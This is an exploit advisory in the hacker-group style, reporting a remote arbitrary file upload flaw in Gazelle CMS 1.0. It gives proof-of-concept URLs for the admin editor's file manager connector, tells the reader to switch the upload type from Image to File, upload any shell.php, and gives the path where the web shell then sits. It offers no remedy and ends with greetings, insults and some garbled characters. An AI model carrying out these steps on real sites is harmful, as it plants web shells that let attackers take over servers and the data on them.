==================================================== | Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln | My Home Page : WwW.Sec-Code.CoM | Founded By RoMaNcYxHaCkEr ==================================================== [!] Discovered.: RoMaNcYxHaCkEr [!] Vendor.....: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download [!] My Homepage...: WwW.Sec-Code.CoM [!] Security - Codes Group ...: aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code [!] Contact Me ...: rXh@Mail.Net.Sa [!] PoC........: http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image ^^^^ This Is Default In Editor admin Try Change Image To File Like This : http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File Upload Any Shell.php Then You See That,s Here E.G. : http://localhost/Ananta_Gazelle1.0/user/File/shell.php [!] Solution...: I Don,t Know He He :D , Contact With Me ;) [!] Greetingz..: All My Forum Members , My TeaM , Dexter Franklin ;) [!] Thx .. : &#216;&#183;&#216;&#217;&#65533;&#216; &#217;&#65533;&#216;&#170;&#216;&#217;&#65533;&#216;&#179; , IHTTeam For His Exploit [!] Fuck To .. : Third , Dev1l-Fucker <<< They Big Big Big Big Lamerz [!] rXh [!] bEST wISHES